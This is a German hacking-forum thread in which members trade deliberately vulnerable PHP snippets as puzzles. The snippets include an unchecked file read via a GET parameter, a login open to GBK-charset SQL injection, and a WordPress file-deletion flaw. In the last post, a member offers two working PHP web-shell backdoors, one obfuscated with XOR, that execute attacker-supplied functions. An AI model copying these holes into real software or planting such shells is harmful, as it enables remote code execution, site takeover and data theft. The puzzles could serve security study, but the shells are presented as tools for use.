Zum Inhalt wechseln

Willkommen Gast

Navigation

Links

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen
Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.
  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[Suche] Code von Lücken

- - - - -

  • Bitte melde dich an um zu Antworten
6 Antworten in diesem Thema

#1
ProHex

ProHex

    Hacker

  • Elite Member
  • Likes
    82
  • 152 Beiträge
  • 27 Bedankt

Yo Leute!

Ich suche code von jeglicher Art von Sicherheitslücke in PHP die ihr finden könnt. So bringen wir mal etwas schwung rein.

 

 


  • hacked gefällt das

#2
tpw

tpw

    Leecher

  • Members
  • PIP
  • Likes
    3
  • 2 Beiträge
  • 0 Bedankt

deliver_image.php:

<?php
$fp = fopen($_GET['name'], 'rb');
 
header("Content-Type: image/png");
header("Content-Length: " . filesize($name));
 
fpassthru($fp);
exit;
?>


Bearbeitet von tpw, 06 Juli 2018 - 10:07 Uhr.

  • ProHex und SecurityFlaw gefällt das

#3
ProHex

ProHex

    Hacker

  • Elite Member
  • Likes
    82
  • 152 Beiträge
  • 27 Bedankt

oh beginnt schonmal super! Freu mich über mehr, auch sehr komplexes zeug :D



#4
IRET

IRET

    Lamer

  • Members
  • PIPPIPPIP
  • Likes
    29
  • 17 Beiträge
  • 1 Bedankt
<?php
$db_host			= "localhost";
$db_name			= "vuln";
$db_user			= "root";
$db_pass			= "";



try
{
    $dbc = new PDO("mysql:host={$db_host};dbname={$db_name}", $db_user, $db_pass);
    $dbc->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $stmt = $dbc->prepare("SET NAMES gbk");
    $stmt->execute();
}
catch (PDOException $e)
{
    die("<div id=\"error\">Error connecting: ".$e->getMessage()."</div>");
}

function db_query($sql)
{
    $args = func_get_args();
    $stmt = $GLOBALS['dbc']->prepare($sql);
    for ($i = 1; $i < func_num_args(); $i++)
        $stmt->bindParam(":$i", $args[$i]);
    try { $stmt->execute(); }
    catch (PDOException $e) { echo "<div id=\"error\">Database error: ".$e->getMessage()."</div>"; }
    return $stmt;
}


if ($_POST && isset($_POST['user']) && isset($_POST['pwd']))
{
    $stmt = db_query("SELECT `id` FROM `users` WHERE `user` = :1 AND `pass` = :2", $_POST['user'], $_POST['pwd']);
    if ($stmt->rowCount() > 0)
    {
        echo "&hearts;";
    }
    else
    {
        echo "Yeah... You definitly got it...";
    }
}
else if (!$_POST)
{
    echo '<form method="POST">
            Username: <input type="text" name="user" placeholder="username"><br>
            Password: <input type="password" name="pwd" placeholder="password"><br>
            <input type="submit" value="Login">
          </form>';
}
else
{
    echo "No, there is no magic vuln here. Get back into the form.";
}


?>


#5
PaulaAbdul

PaulaAbdul

    Favoured Management

  • Administration
  • Likes
    3.340
  • 2.119 Beiträge
  • 2962 Bedankt
  • 1337-699
  • verifiziert
  • Android [root]
  • Windows, Linux
<?php
$db_host			= "localhost";
$db_name			= "vuln";
$db_user			= "root";
$db_pass			= "";



try
{
    $dbc = new PDO("mysql:host={$db_host};dbname={$db_name}", $db_user, $db_pass);
    $dbc->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $stmt = $dbc->prepare("SET NAMES gbk");
    $stmt->execute();
}
catch (PDOException $e)
{
    die("<div id=\"error\">Error connecting: ".$e->getMessage()."</div>");
}

function db_query($sql)
{
    $args = func_get_args();
    $stmt = $GLOBALS['dbc']->prepare($sql);
    for ($i = 1; $i < func_num_args(); $i++)
        $stmt->bindParam(":$i", $args[$i]);
    try { $stmt->execute(); }
    catch (PDOException $e) { echo "<div id=\"error\">Database error: ".$e->getMessage()."</div>"; }
    return $stmt;
}


if ($_POST && isset($_POST['user']) && isset($_POST['pwd']))
{
    $stmt = db_query("SELECT `id` FROM `users` WHERE `user` = :1 AND `pass` = :2", $_POST['user'], $_POST['pwd']);
    if ($stmt->rowCount() > 0)
    {
        echo "&hearts;";
    }
    else
    {
        echo "Yeah... You definitly got it...";
    }
}
else if (!$_POST)
{
    echo '<form method="POST">
            Username: <input type="text" name="user" placeholder="username"><br>
            Password: <input type="password" name="pwd" placeholder="password"><br>
            <input type="submit" value="Login">
          </form>';
}
else
{
    echo "No, there is no magic vuln here. Get back into the form.";
}


?>

 

Brainfuck  ^_^


  • IRET gefällt das

VC0cXsp.gif

ho ho ho, it's magic...


#6
pi^2

pi^2

    Hacker

  • Premium Member
  • Likes
    272
  • 181 Beiträge
  • 45 Bedankt

Wer bekommts raus (CVE)?

if (!empty($meta['dao']) ) {
    if (!$wpdb->get_row( $wpdb->prepare( "SELECT id FROM $wpdb->postmeta WHERE key = '_wp_attachment' AND val LIKE %s AND id <> %d", '%' . $wpdb->esc_like( $meta['dao'] ) . '%', $post_id)) ) {
	$tf = str_replace(basename($file), $meta['dao'], $file);
	$tf = apply_filters( 'wp_delete_file', $tf );
	@unlink( path_join($uploadpath['basedir'], $tf) );
    }
}

Die Variablen/Arrays wurden umbenannt damit das hier auch ne Challenge wird ;- )


  • ProHex, B1nary und SecurityFlaw gefällt das

#7
SecurityFlaw

SecurityFlaw

    1337

  • Elite Member
  • Likes
    227
  • 321 Beiträge
  • 57 Bedankt
  • Android, Android [root]
  • Windows

Nicht direkt eine Lücke aber nützlich:

<?php error_reporting(0); extract($_REQUEST); die($ctime($atime)); ?>

Oder lieber sowas?:

<?@$_++;$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");@${$__}[!$_](${$__}[$_]);?>

Bearbeitet von SecurityFlaw, 27 Juli 2018 - 14:08 Uhr.

  • IRET gefällt das



  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen: 1

Mitglieder: 0, Gäste: 1, unsichtbare Mitglieder: 0

Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.